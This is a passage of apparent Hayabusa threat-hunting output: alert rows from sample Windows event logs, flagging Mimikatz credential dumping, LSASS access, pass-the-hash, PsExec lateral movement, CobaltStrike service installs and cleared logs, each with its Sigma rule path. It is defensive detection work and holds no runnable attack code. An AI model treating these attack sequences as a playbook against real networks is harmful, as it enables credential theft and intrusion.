Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx -2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx -2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx -2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx -2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 